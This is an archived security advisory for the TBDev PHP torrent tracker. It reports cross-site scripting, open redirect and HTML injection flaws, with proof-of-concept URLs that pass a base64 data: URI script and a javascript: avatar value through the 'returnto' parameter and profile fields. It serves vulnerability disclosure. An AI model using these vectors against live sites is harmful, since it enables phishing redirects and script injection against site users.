AOH :: HP Unsorted T :: BT-21173.HTM

TBDev 01-01-2008 - Multiple Vulnerabilities



TBDev 01-01-2008 - Multiple Vulnerabilities
TBDev 01-01-2008 - Multiple Vulnerabilities



TBDev - Cross Site Scripting and HTML Injection Vulnerabilities

Version Affected: 01-01-2008 (16th January 2008) (newest)

Info: TBDEV.NET is a project to further enhance, update and develop a software (php peer-to-peer) from the original torrentbits/bytemonsoon source code.

Credits: InterN0T

External Links:
http://www.tbdev.net 


-:: The Advisory ::-

Vulnerable Function / ID Calls: 
returnto

Cross Site Scripting: (Sysops / Mods Only!)
http://[HOST]/tbdev/tbdev-01-01-08/makepoll.php?returnto=> 
http://[HOST]/tbdev/tbdev-01-01-08/polls.php?action=delete&pollid=1&returnto=> 

Cross Site Script Redirection: (Sysops / Mods Only!)
http://[HOST]/tbdev/tbdev-01-01-08/news.php?action=delete&newsid=1&returnto=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K&sure=1 

Cross Site Script Redirection: (Anyone, the enduser will need to log in though)
http://[HOST]/tbdev/tbdev-01-01-08/login.php?returnto=http://[HOST] 
http://[HOST]/tbdev/tbdev-01-01-08/login.php?returnto=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K 

HTML Injection: 
1) http://[HOST]/tbdev/tbdev-01-01-08/my.php 
-- Info field:  << is reflected locally only!

2) http://[HOST]/tbdev/tbdev-01-01-08/my.php 
-- Avatar field: javascript:alert(0)

2b) Affected Sites by HTML Injection:
http://[HOST]/tbdev/tbdev-01-01-08/userdetails.php?id=USERID 

Internet Explorer 6 and perhaps 7 should be triggered by this.
Please see: http://ha.ckers.org/xss.html for more information. 
Browser Tested: Internet Explorer 7 (FireFox 3 was tested for the other vulnerabilities)

-:: Solution ::-
Secure redirection calls with referer headers (just an example) and filter bad characters.

Conclusion:
This system was fun to find bad code in, it sure had a nice diversity of vulnerabilities.

Reference:
http://forum.intern0t.net/intern0t-advisories/1121-intern0t-tbdev-01-01-2008-multiple-vulnerabilities.html 

Disclosure Information:
- Vulnerabilities found, researched and confirmed between 5th to 10th June.
- Advisory finished and published on InterN0T the 12th June.
- Vendor and Buqtraq (SecurityFocus) contacted the 12th June.


All of the best,
MaXe

The entire AOH site is optimized to look best in Firefox® 3 on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH
We do not send spam. If you have received spam bearing an artofhacking.com email address, please forward it with full headers to abuse@artofhacking.com.